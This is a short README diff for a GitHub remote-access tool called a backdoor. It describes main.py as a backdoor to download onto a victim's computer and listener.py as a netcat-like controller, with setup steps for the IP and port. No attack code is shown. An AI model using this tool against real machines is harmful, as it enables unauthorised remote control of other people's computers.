OldKokoroz/backdoor-ng/README.md

     git clone https://github.com/OldKokoroz/Red-BackDoor.git

-Make sure to specify Ip and the Port
+main.py     --> Backdoor that is to download on the victim's computer listener.py --> Just like netcat (Execute a few commands on victim's computer)

-Enter port without quotes in both files
+Enter port without quotes in both files in "main.py" before sendşng and downloading it

     Example : "10.10.10.10", 4444